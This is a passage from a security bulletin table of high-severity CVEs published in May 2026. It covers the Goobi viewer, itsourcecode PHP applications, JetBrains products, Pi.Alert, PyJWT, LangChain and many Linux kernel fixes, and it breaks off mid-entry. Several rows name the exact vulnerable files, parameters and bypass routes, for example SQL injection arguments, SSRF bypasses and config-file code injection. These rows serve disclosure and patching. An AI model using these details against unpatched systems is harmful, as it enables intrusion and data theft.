| intranda--goobi-viewer-core | The Goobi viewer is a web application that allows digitised material to be displayed in a web browser. From 4.8.0 to before 26.04.1, the Goobi viewer REST endpoint POST /api/v1/index/stream accepted an arbitrary Solr streaming expression from unauthenticated network clients and forwarded it to the backend Solr server without restriction. An attacker could read the complete Solr index and, in default Solr deployments, also modify or delete indexed records. This vulnerability is fixed in 26.04.1. | 2026-05-27 | 9.8 | CVE-2026-45083 |
| Iqonic Design--KiviCare | Authentication Bypass Using an Alternate Path or Channel vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows Password Recovery Exploitation.This issue affects KiviCare: from n/a through <= 4.3.0. | 2026-05-27 | 8.2 | CVE-2026-42735 |
| itsourcecode--Courier Management System | A vulnerability has been found in itsourcecode Courier Management System 1.0. Impacted is an unknown function of the file /manage_user.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9606 |
| itsourcecode--Electronic Judging System | A vulnerability has been found in itsourcecode Electronic Judging System 1.0. This affects an unknown part of the file /admin/edit_judge.php. The manipulation of the argument judge_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9525 |
| itsourcecode--Electronic Judging System | A vulnerability was found in itsourcecode Electronic Judging System 1.0. This vulnerability affects unknown code of the file /admin/edit_team.php. The manipulation of the argument num_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-05-26 | 7.3 | CVE-2026-9526 |
| itsourcecode--Electronic Judging System | A vulnerability was identified in itsourcecode Electronic Judging System 1.0. Impacted is an unknown function of the file /admin/delete_judge.php. Such manipulation of the argument judge_id leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2026-05-26 | 7.3 | CVE-2026-9528 |
| itsourcecode--Student Transcript Processing System | A vulnerability was detected in itsourcecode Student Transcript Processing System 1.0. This affects an unknown part of the file /admin/modules/student/index.php?view=view. Performing a manipulation of the argument studentId results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9573 |
| itsourcecode--Student Transcript Processing System | A flaw has been found in itsourcecode Student Transcript Processing System 1.0. This vulnerability affects unknown code of the file /admin/modules/student/trans.php. Executing a manipulation of the argument studentId/cid can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2026-05-26 | 7.3 | CVE-2026-9574 |
| itsourcecode--Student Transcript Processing System | A vulnerability has been found in itsourcecode Student Transcript Processing System 1.0. This issue affects some unknown processing of the file /admin/modules/class/index.php?view=view. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 7.3 | CVE-2026-9575 |
| JasperFx--marten | Marten is a .NET Transactional Document DB and Event Store on PostgreSQL. Prior to 8.36.1, Marten's full-text search APIs interpolated the user-supplied regConfig parameter directly into the generated SQL without parameterization or validation, making every code path that exposes regConfig to untrusted input a SQL injection sink. This vulnerability is fixed in 8.36.1. | 2026-05-28 | 9.8 | CVE-2026-45288 |
| JeecgBoot--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.1. The affected element is the function LoginController.selectDepart of the file /sys/selectDepart. This manipulation causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is sufficient to fix this issue. It is suggested to upgrade the affected component. | 2026-05-26 | 7.3 | CVE-2026-9580 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1.1 command execution was possible via the guest user account | 2026-05-29 | 8 | CVE-2026-49367 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1.1 command injection was possible via filename completion | 2026-05-29 | 7.8 | CVE-2026-49366 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1.1 reflected XSS in the keyword filter was possible | 2026-05-29 | 7.1 | CVE-2026-49371 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1, 2025.11.5 unauthenticated SSRF via build status was possible | 2026-05-29 | 7.5 | CVE-2026-49372 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 remote code execution was possible via Perforce connection settings | 2026-05-29 | 7.1 | CVE-2026-49373 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 improper permission checks exposed build configuration parameters | 2026-05-29 | 7.6 | CVE-2026-49374 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13162 stored XSS in project notification templates was possible | 2026-05-29 | 8.7 | CVE-2026-49368 |
| Jinan USR IOT Technology Limited (PUSR)--USR-W610 RS232/485 to Wi-Fi/Ethernet Converter | Jinan USR IOT Technology Limited (PUSR) USR-W610 RS232/485 to Wi-Fi/Ethernet Converter device firmware contains plaintext administrative credentials embedded in the firmware image. These credentials can be extracted through firmware analysis and used to authenticate to device services. | 2026-05-29 | 9.8 | CVE-2026-7786 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 7.4 | CVE-2026-48526 |
| jpettitt--meshcore-card | MeshCore Card provides MeshCore Lovelace card for Home Assistant. Prior to 0.3.3, Meshcore node names are rendered without HTML escaping in meshcore-card, allowing any node within direct or indirect (repeated) radio range to execute arbitrary javascript in the Home Assistant frontend of anyone viewing the card. This vulnerability is fixed in 0.3.3. | 2026-05-28 | 9.6 | CVE-2026-45323 |
| Jthemes--Themebox - Digital Products Ecommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes Themebox - Digital Products Ecommerce allows Reflected XSS. This issue affects Themebox - Digital Products Ecommerce: from n/a through 1.4.2. | 2026-05-27 | 7.1 | CVE-2025-52747 |
| jxxghp--MoviePilot | MoviePilot v2 contains a server-side request forgery vulnerability in the image proxy endpoint that allows authenticated attackers to request arbitrary URLs by supplying a resource_token cookie and a URL whose domain matches the assembled allowlist. Attackers can bypass internal network protections because the SecurityUtils.is_safe_url function performs only domain-membership checking without blocking private, loopback, or link-local addresses, enabling enumeration of internal services such as Jellyfin, Emby, or Plex and exfiltration of data from internal network resources. | 2026-05-29 | 7.7 | CVE-2026-10107 |
| Kados--Kados R10 GreenBee | Kados R10 GreenBee contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the release_id parameter of boards_buttons/update_release.php. The release_id value is concatenated directly into SQL statements without sanitization, allowing attackers to send a crafted GET request with a UNION-based payload to extract sensitive database information including the current user, database name, and DBMS version. | 2026-05-29 | 8.2 | CVE-2018-25394 |
| Kados--Kados R10 GreenBee | Kados R10 GreenBee contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the feature_id parameter of boards_buttons/update_feature.php. The feature_id value is concatenated directly into SQL statements without sanitization, allowing attackers to send a crafted GET request with a UNION-based payload to extract sensitive database information including the current user, database name, and DBMS version. | 2026-05-29 | 8.2 | CVE-2018-25395 |
| karakeep-app--karakeep | Karakeep is a elf-hostable bookmark-everything app. A Server-Side Request Forgery (SSRF) protection bypass vulnerability was identified in versions prior to 0.32.0 affecting redirect-following processing components. Although the application implements protections intended to prevent requests toward internal/private network destinations, these protections could be bypassed through crafted HTTP redirect chains. By leveraging attacker-controlled redirects, an authenticated user could cause vulnerable application components to initiate requests toward internally reachable Docker network services accessible from the application environment. The issue affected multiple processing paths, including crawler-related functionality and video download processing flows. Version 0.32.0 contains a patch. | 2026-05-26 | 7.6 | CVE-2026-45082 |
| kaspernj--form-data-objectizer | form-data-objectizer converts FormData to object. Prior to 1.0.1, form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process. This vulnerability is fixed in 1.0.1. | 2026-05-29 | 8.2 | CVE-2026-46510 |
| klever-io--klever-go | Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.17, a remote, unauthenticated denial-of-service vulnerability in Batch.Decompress (data/batch/batch.go) allows any peer that participates in a topic served by MultiDataInterceptor to allocate multi-gigabyte heaps on the receiving node from a sub-50 KiB gossip payload. A single packet is sufficient to OOM-kill a validator with conventional memory provisioning. Fleet-wide application affects chain liveness. This vulnerability is fixed in 1.7.17. | 2026-05-29 | 8.6 | CVE-2026-44697 |
| KLiK --KLiK SocialMediaWebsite | A vulnerability was determined in KLiK SocialMediaWebsite 1.0. This vulnerability affects the function uniqid of the file upload.inc.php of the component File Handler. This manipulation causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 7.3 | CVE-2026-9421 |
| KLiK --KLiK SocialMediaWebsite | A vulnerability was identified in KLiK SocialMediaWebsite 1.0. This issue affects some unknown processing of the component HTTP POST Request Parameter Handler. Such manipulation leads to injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2026-05-25 | 7.3 | CVE-2026-9422 |
| KMW--KM-IP521 | The affected KMW CCTV Security Cameras are vulnerable to a critical unauthenticated password reset. This flaw allows an attacker to remotely reset the administrator password to a known value without authentication, granting full access to the camera feeds and settings. | 2026-05-29 | 9.1 | CVE-2026-5386 |
| Koa--@koa/router | Versions of the package @koa/router from 14.0.0 and before 15.0.0 are vulnerable to Access Control Bypass due to the middleware being silently dropped from the execution chain when the router prefix contains path parameters. Depending on what the skipped middleware was supposed to protect, an attacker could bypass authentication and authorization, evade rate limiting or bypass input sanitization. | 2026-05-26 | 7.3 | CVE-2026-9495 |
| Kovah--LinkAce | LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, the setup database configuration flow on uninitialized LinkAce instances accepts attacker-controlled database credential fields and writes them back into .env without escaping. A remote attacker who can reach the setup endpoints and supply a database they control can inject mail configuration variables and achieve command execution when the application later sends mail. This vulnerability is fixed in 2.5.6. | 2026-05-28 | 8.1 | CVE-2026-45344 |
| kysely-org--kysely | Kysely is a type-safe TypeScript SQL query builder. From 0.26.0 to 0.28.16, DefaultQueryCompiler.visitJSONPathLeg does not escape JSON-path metacharacters (., [, ], *, **, ?). When attacker-controlled input flows into eb.ref(col, '->$').key(input) or .at(input) - including type-safe code where the JSON column is shaped like Record<string, T> so K extends string is the inferred type - every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL ->$/->>$, and SQLite. This vulnerability is fixed in 0.28.17. | 2026-05-27 | 7.5 | CVE-2026-44635 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to 4.15.0-beta1, a Server-Side Request Forgery (SSRF) vulnerability allows an authenticated attacker to bypass the global isInternalAddress network protection and make arbitrary HTTP GET requests to internal network services. This is achieved by exploiting an incomplete fix in the dataset preview endpoint /api/core/dataset/file/getPreviewChunks when utilizing the externalFile data import type. This vulnerability is fixed in 4.15.0-beta1. | 2026-05-29 | 7.7 | CVE-2026-44285 |
| Lakeside Software, LLC.--SysTrack Agent | Lakeside SysTrack Agent versions prior to 11.2.1.28, 11.3.0.38, 11.4.0.24, 11.5.0.15 contain an out-of-bounds read vulnerability in the Command ID 30 UDP packet handler that allows remote attackers to crash the application by sending a specially crafted UDP packet. Attackers can send a malformed packet with an invalid memory address at offset 0x4 in the payload to trigger an access violation and cause a denial of service. | 2026-05-28 | 7.5 | CVE-2026-39929 |
| langchain-ai--langchain | LangChain is a framework for building agents and LLM-powered applications. Prior to 0.3.85 and 1.3.3, LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call load() with allowed_objects="all". This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments. This vulnerability is fixed in 0.3.85 and 1.3.3. | 2026-05-26 | 8.2 | CVE-2026-44843 |
| langchain-ai--langsmith-sdk | LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to LangSmith SDK Python 0.8.0 and JS/TS 0.6.0, the LangSmith SDK's prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) fetch and deserialize prompt manifests from the LangSmith Hub. These manifests may contain serialized LangChain objects and model configuration that affect runtime behavior. When pulling a public prompt by owner/name identifier, the manifest content is controlled by an external party, but prior versions of the SDK did not distinguish this from pulling a prompt within the caller's own organization. This vulnerability is fixed in LangSmith SDK Python 0.8.0 and JS/TS 0.6.0. | 2026-05-27 | 7.1 | CVE-2026-45134 |
| learnnearclub--Login with NEAR | The Login with NEAR plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 0.3.3. The `ajaxLoginWithNear()` function - registered as a `wp_ajax_nopriv` action and therefore reachable by unauthenticated users - accepts an attacker-supplied `account` POST parameter and issues a valid WordPress authentication cookie based solely on a substring check for `.near`, with no nonce verification, cryptographic signature validation, challenge-response exchange, or any proof that the requester controls the corresponding NEAR wallet. This makes it possible for unauthenticated attackers to log in as any existing WordPress user, including administrators, whose email address matches the deterministic `<account>@near.org` pattern derived from the supplied `account` value. If no matching user exists, the handler automatically creates and authenticates a new WordPress account for the attacker-controlled identifier, providing a further avenue for unauthorized account creation. | 2026-05-27 | 8.1 | CVE-2026-8994 |
| leiweibau--Pi.Alert | Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. Prior to 2026-05-07, Pi.Alert's web-based configuration editor allows arbitrary Python code to be injected into pialert.conf. Since the background scan daemon loads this file via Python's exec(), injected code executes as the daemon process. With web protection disabled (the default configuration), no authentication is required, making this an unauthenticated Remote Code Execution vulnerability. This vulnerability is fixed in 2026-05-07. | 2026-05-27 | 9.8 | CVE-2026-44887 |
| leiweibau--Pi.Alert | Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. Prior to 2026-05-07, Pi.Alert's SaveConfigFile() endpoint writes user-supplied numeric config values (e.g., SMTP_PORT) directly into pialert.conf without validation. Since pialert.conf is loaded via Python's exec() every 3-5 minutes by the background cron process, an attacker can inject arbitrary Python code and achieve unauthenticated OS-level RCE. On default installations (PIALERT_WEB_PROTECTION = False), no credentials are required. This vulnerability is fixed in 2026-05-07. | 2026-05-27 | 9.8 | CVE-2026-44888 |
| LibVNC--libvncserver | LibVNCClient is a library for easy implementation of a VNC client. In 0.9.15 and earlier, LibVNCClient's Tight encoding decoder uses fixed-size 2048-pixel scratch buffers for the Gradient filter, but it does not reject Tight rectangles whose width is larger than 2048 pixels. A malicious VNC server can send a crafted FramebufferUpdate rectangle using Tight encoding with NoZlib | ExplicitFilter and the Gradient filter. When a LibVNCClient-based client connects, the client processes the server-controlled rectangle width and writes beyond fixed-size Gradient buffers. This vulnerability is fixed with commit 5b270544b85233668b98161323297d418a8f5fd1. | 2026-05-27 | 8.8 | CVE-2026-44988 |
| linkwhspr--Link Whisper Free | The Link Whisper Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 0.9.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 7.2 | CVE-2025-11262 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/iwcm: Fix workqueue list corruption by removing work_list The commit e1168f0 ("RDMA/iwcm: Simplify cm_event_handler()") changed the work submission logic to unconditionally call queue_work() with the expectation that queue_work() would have no effect if work was already pending. The problem is that a free list of struct iwcm_work is used (for which struct work_struct is embedded), so each call to queue_work() is basically unique and therefore does indeed queue the work. This causes a problem in the work handler which walks the work_list until it's empty to process entries. This means that a single run of the work handler could process item N+1 and release it back to the free list while the actual workqueue entry is still queued. It could then get reused (INIT_WORK...) and lead to list corruption in the workqueue logic. Fix this by just removing the work_list. The workqueue already does this for us. This fixes the following error that was observed when stress testing with ucmatose on an Intel E830 in iWARP mode: [ 151.465780] list_del corruption. next->prev should be ffff9f0915c69c08, but was ffff9f0a1116be08. (next=ffff9f0a15b11c08) [ 151.466639] ------------[ cut here ]------------ [ 151.466986] kernel BUG at lib/list_debug.c:67! [ 151.467349] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 151.467753] CPU: 14 UID: 0 PID: 2306 Comm: kworker/u64:18 Not tainted 6.19.0-rc4+ #1 PREEMPT(voluntary) [ 151.468466] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 151.469192] Workqueue: 0x0 (iw_cm_wq) [ 151.469478] RIP: 0010:__list_del_entry_valid_or_report+0xf0/0x100 [ 151.469942] Code: c7 58 5f 4c b2 e8 10 50 aa ff 0f 0b 48 89 ef e8 36 57 cb ff 48 8b 55 08 48 89 e9 48 89 de 48 c7 c7 a8 5f 4c b2 e8 f0 4f aa ff <0f> 0b 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 90 90 90 90 90 90 [ 151.471323] RSP: 0000:ffffb15644e7bd68 EFLAGS: 00010046 [ 151.471712] RAX: 000000000000006d RBX: ffff9f0915c69c08 RCX: 0000000000000027 [ 151.472243] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff9f0a37d9c600 [ 151.472768] RBP: ffff9f0a15b11c08 R08: 0000000000000000 R09: c0000000ffff7fff [ 151.473294] R10: 0000000000000001 R11: ffffb15644e7bba8 R12: ffff9f092339ee68 [ 151.473817] R13: ffff9f0900059c28 R14: ffff9f092339ee78 R15: 0000000000000000 [ 151.474344] FS: 0000000000000000(0000) GS:ffff9f0a847b5000(0000) knlGS:0000000000000000 [ 151.474934] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 151.475362] CR2: 0000559e233a9088 CR3: 000000020296b004 CR4: 0000000000770ef0 [ 151.475895] PKRU: 55555554 [ 151.476118] Call Trace: [ 151.476331] <TASK> [ 151.476497] move_linked_works+0x49/0xa0 [ 151.476792] __pwq_activate_work.isra.46+0x2f/0xa0 [ 151.477151] pwq_dec_nr_in_flight+0x1e0/0x2f0 [ 151.477479] process_scheduled_works+0x1c8/0x410 [ 151.477823] worker_thread+0x125/0x260 [ 151.478108] ? __pfx_worker_thread+0x10/0x10 [ 151.478430] kthread+0xfe/0x240 [ 151.478671] ? __pfx_kthread+0x10/0x10 [ 151.478955] ? __pfx_kthread+0x10/0x10 [ 151.479240] ret_from_fork+0x208/0x270 [ 151.479523] ? __pfx_kthread+0x10/0x10 [ 151.479806] ret_from_fork_asm+0x1a/0x30 [ 151.480103] </TASK> | 2026-05-27 | 9.8 | CVE-2026-45898 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF and double free in smb2_open_file() Zero out @err_iov and @err_buftype before retrying SMB2_open() to prevent an UAF bug if @data != NULL, otherwise a double free. | 2026-05-27 | 9.8 | CVE-2026-45972 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix re-decryption of RESPONSE packets If a RESPONSE packet gets a temporary failure during processing, it may end up in a partially decrypted state - and then get requeued for a retry. Fix this by just discarding the packet; we will send another CHALLENGE packet and thereby elicit a further response. Similarly, discard an incoming CHALLENGE packet if we get an error whilst generating a RESPONSE; the server will send another CHALLENGE. | 2026-05-27 | 9.8 | CVE-2026-45988 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxgk: Fix potential integer overflow in length check Fix potential integer overflow in rxgk_extract_token() when checking the length of the ticket. Rather than rounding up the value to be tested (which might overflow), round down the size of the available data. | 2026-05-27 | 9.8 | CVE-2026-46039 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Validate pad and ICRC before payload_size() in rxe_rcv rxe_rcv() currently checks only that the incoming packet is at least header_size(pkt) bytes long before payload_size() is used. However, payload_size() subtracts both the attacker-controlled BTH pad field and RXE_ICRC_SIZE from pkt->paylen: payload_size = pkt->paylen - offset[RXE_PAYLOAD] - bth_pad(pkt) - RXE_ICRC_SIZE This means a short packet can still make payload_size() underflow even if it includes enough bytes for the fixed headers. Simply requiring header_size(pkt) + RXE_ICRC_SIZE is not sufficient either, because a packet with a forged non-zero BTH pad can still leave payload_size() negative and pass an underflowed value to later receive-path users. Fix this by validating pkt->paylen against the full minimum length required by payload_size(): header_size(pkt) + bth_pad(pkt) + RXE_ICRC_SIZE. | 2026-05-27 | 9.1 | CVE-2026-46043 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: add pgmap check to biovec_phys_mergeable biovec_phys_mergeable() is used by the request merge, DMA mapping, and integrity merge paths to decide if two physically contiguous bvec segments can be coalesced into one. It currently has no check for whether the segments belong to different dev_pagemaps. When zone device memory is registered in multiple chunks, each chunk gets its own dev_pagemap. A single bio can legitimately contain bvecs from different pgmaps -- iov_iter_extract_bvecs() breaks at pgmap boundaries but the outer loop in bio_iov_iter_get_pages() continues filling the same bio. If such bvecs are physically contiguous, biovec_phys_mergeable() will coalesce them, making it impossible to recover the correct pgmap for the merged segment via page_pgmap(). Add a zone_device_pages_have_same_pgmap() check to prevent merging bvec segments that span different pgmaps. | 2026-05-28 | 9.8 | CVE-2026-46115 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Fix slab-out-of-bounds access in auth message processing If a (potentially corrupted) message of type CEPH_MSG_AUTH_REPLY contains a positive value in its result field, it is treated as an error code by ceph_handle_auth_reply() and returned to handle_auth_reply(). Thereafter, an attempt is made to send the preallocated message of type CEPH_MSG_AUTH, where the returned value is interpreted as the size of the front segment to send. If the result value in the message is greater than the size of the memory buffer allocated for the front segment, an out-of-bounds access occurs, and the content of the memory region beyond this buffer is sent out. This patch fixes the issue by treating only negative values in the result field as errors. Positive values are therefore treated as success in the same way as a zero value. Additionally, a BUG_ON is added to __send_prepared_auth_request() comparing the len parameter to front_alloc_len to prevent sending the message if it exceeds the bounds of the allocation and to make it easier to catch any logic flaws leading to this. | 2026-05-28 | 9.1 | CVE-2026-46119 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: fix race between ICReq handling and queue teardown nvmet_tcp_handle_icreq() updates queue->state after sending an Initialization Connection Response (ICResp), but it does so without serializing against target-side queue teardown. If an NVMe/TCP host sends an Initialization Connection Request (ICReq) and immediately closes the connection, target-side teardown may start in softirq context before io_work drains the already buffered ICReq. In that case, nvmet_tcp_schedule_release_queue() sets queue->state to NVMET_TCP_Q_DISCONNECTING and drops the queue reference under state_lock. If io_work later processes that ICReq, nvmet_tcp_handle_icreq() can still overwrite the state back to NVMET_TCP_Q_LIVE. That defeats the DISCONNECTING-state guard in nvmet_tcp_schedule_release_queue() and allows a later socket state change to re-enter teardown and issue a second kref_put() on an already released queue. The ICResp send failure path has the same problem. If teardown has already moved the queue to DISCONNECTING, a send error can still overwrite the state with NVMET_TCP_Q_FAILED, again reopening the window for a second teardown path to drop the queue reference. Fix this by serializing both post-send state transitions with state_lock and bailing out if teardown has already started. Use -ESHUTDOWN as an internal sentinel for that bail-out path rather than propagating it as a transport error like -ECONNRESET. Keep nvmet_tcp_socket_error() setting rcv_state to NVMET_TCP_RECV_ERR before honoring that sentinel so receive-side parsing stays quiesced until the existing release path completes. | 2026-05-28 | 9.8 | CVE-2026-46135 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: ADD_ADDR rtx: fix potential data-race This mptcp_pm_add_timer() helper is executed as a timer callback in softirq context. To avoid any data races, the socket lock needs to be held with bh_lock_sock(). If the socket is in use, retry again soon after, similar to what is done with the keepalive timer. | 2026-05-28 | 9.8 | CVE-2026-46137 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/client: fix out-of-bounds read in smb2_compound_op() If a server sends a truncated response but a large OutputBufferLength, and terminates the EA list early, check_wsl_eas() returns success without validating that the entire OutputBufferLength fits within iov_len. Then smb2_compound_op() does: memcpy(idata->wsl.eas, data[0], size[0]); Where size[0] is OutputBufferLength. If iov_len is smaller than size[0], memcpy can read beyond the end of the rsp_iov allocation and leak adjacent kernel heap memory. | 2026-05-28 | 9.1 | CVE-2026-46155 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/client: fix out-of-bounds read in symlink_data() Since smb2_check_message() returns success without length validation for the symlink error response, in symlink_data() it is possible for iov->iov_len to be smaller than sizeof(struct smb2_err_rsp). If the buffer only contains the base SMB2 header (64 bytes), accessing err->ErrorContextCount (at offset 66) or err->ByteCount later in symlink_data() will cause an out-of-bounds read. | 2026-05-28 | 9.1 | CVE-2026-46185 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: validate dacloffset before building DACL pointers parse_sec_desc(), build_sec_desc(), and the chown path in id_mode_to_cifs_acl() all add the server-supplied dacloffset to pntsd before proving a DACL header fits inside the returned security descriptor. On 32-bit builds a malicious server can return dacloffset near U32_MAX, wrap the derived DACL pointer below end_of_acl, and then slip past the later pointer-based bounds checks. build_sec_desc() and id_mode_to_cifs_acl() can then dereference DACL fields from the wrapped pointer in the chmod/chown rewrite paths. Validate dacloffset numerically before building any DACL pointer and reuse the same helper at the three DACL entry points. | 2026-05-28 | 9.8 | CVE-2026-46195 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slip: bound decode() reads against the compressed packet length slhc_uncompress() parses a VJ-compressed TCP header by advancing a pointer through the packet via decode() and pull16(). Neither helper bounds-checks against isize, and decode() masks its return with & 0xffff so it can never return the -1 that callers test for -- those error paths are dead code. A short compressed frame whose change byte requests optional fields lets decode() read past the end of the packet. The over-read bytes are folded into the cached cstate and reflected into subsequent reconstructed packets. Make decode() and pull16() take the packet end pointer and return -1 when exhausted. Add a bounds check before the TCP-checksum read. The existing == -1 tests now do what they were always meant to. | 2026-05-27 | 8.2 | CVE-2026-45843 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Fix race condition during PASID entry replacement The Intel VT-d PASID table entry is 512 bits (64 bytes). When replacing an active PASID entry (e.g., during domain replacement), the current implementation calculates a new entry on the stack and copies it to the table using a single structure assignment. struct pasid_entry *pte, new_pte; pte = intel_pasid_get_entry(dev, pasid); pasid_pte_config_first_level(iommu, &new_pte, ...); *pte = new_pte; Because the hardware may fetch the 512-bit PASID entry in multiple 128-bit chunks, updating the entire entry while it is active (Present bit set) risks a "torn" read. In this scenario, the IOMMU hardware could observe an inconsistent state - partially new data and partially old data - leading to unpredictable behavior or spurious faults. Fix this by removing the unsafe "replace" helpers and following the "clear-then-update" flow, which ensures the Present bit is cleared and the required invalidation handshake is completed before the new configuration is applied. | 2026-05-27 | 8.8 | CVE-2026-45945 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix error handling in rxgk_extract_token() Fix a missing bit of error handling in rxgk_extract_token(): in the event that rxgk_decrypt_skb() returns -ENOMEM, it should just return that rather than continuing on (for anything else, it generates an abort). | 2026-05-27 | 8.1 | CVE-2026-46010 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: icmp: validate reply type before using icmp_pointers Extended echo replies use ICMP_EXT_ECHOREPLY as the outbound reply type. That value is outside the range covered by icmp_pointers[], which only describes the traditional ICMP types up to NR_ICMP_TYPES. Avoid consulting icmp_pointers[] for reply types outside that range, and use array_index_nospec() for the remaining in-range lookup. Normal ICMP replies keep their existing behavior unchanged. | 2026-05-27 | 8.2 | CVE-2026-46037 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: fix potential UAF in SSP passkey handlers hci_conn lookup and field access must be covered by hdev lock in hci_user_passkey_notify_evt() and hci_keypress_notify_evt(), otherwise the connection can be freed concurrently. Extend the hci_dev_lock critical section to cover all conn usage in both handlers. Keep the existing keypress notification behavior unchanged by routing the early exits through a common unlock path. | 2026-05-27 | 8.8 | CVE-2026-46056 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipv6: fix NOREF dst use in seg6 and rpl lwtunnels seg6_input_core() and rpl_input() call ip6_route_input() which sets a NOREF dst on the skb, then pass it to dst_cache_set_ip6() invoking dst_hold() unconditionally. On PREEMPT_RT, ksoftirqd is preemptible and a higher-priority task can release the underlying pcpu_rt between the lookup and the caching through a concurrent FIB lookup on a shared nexthop. Simplified race sequence: ksoftirqd/X higher-prio task (same CPU X) ----------- -------------------------------- seg6_input_core(,skb)/rpl_input(skb) dst_cache_get() -> miss ip6_route_input(skb) -> ip6_pol_route(,skb,flags) [RT6_LOOKUP_F_DST_NOREF in flags] -> FIB lookup resolves fib6_nh [nhid=N route] -> rt6_make_pcpu_route() [creates pcpu_rt, refcount=1] pcpu_rt->sernum = fib6_sernum [fib6_sernum=W] -> cmpxchg(fib6_nh.rt6i_pcpu, NULL, pcpu_rt) [slot was empty, store succeeds] -> skb_dst_set_noref(skb, dst) [dst is pcpu_rt, refcount still 1] rt_genid_bump_ipv6() -> bumps fib6_sernum [fib6_sernum from W to Z] ip6_route_output() -> ip6_pol_route() -> FIB lookup resolves fib6_nh [nhid=N] -> rt6_get_pcpu_route() pcpu_rt->sernum != fib6_sernum [W <> Z, stale] -> prev = xchg(rt6i_pcpu, NULL) -> dst_release(prev) [prev is pcpu_rt, refcount 1->0, dead] dst = skb_dst(skb) [dst is the dead pcpu_rt] dst_cache_set_ip6(dst) -> dst_hold() on dead dst -> WARN / use-after-free For the race to occur, ksoftirqd must be preemptible (PREEMPT_RT without PREEMPT_RT_NEEDS_BH_LOCK) and a 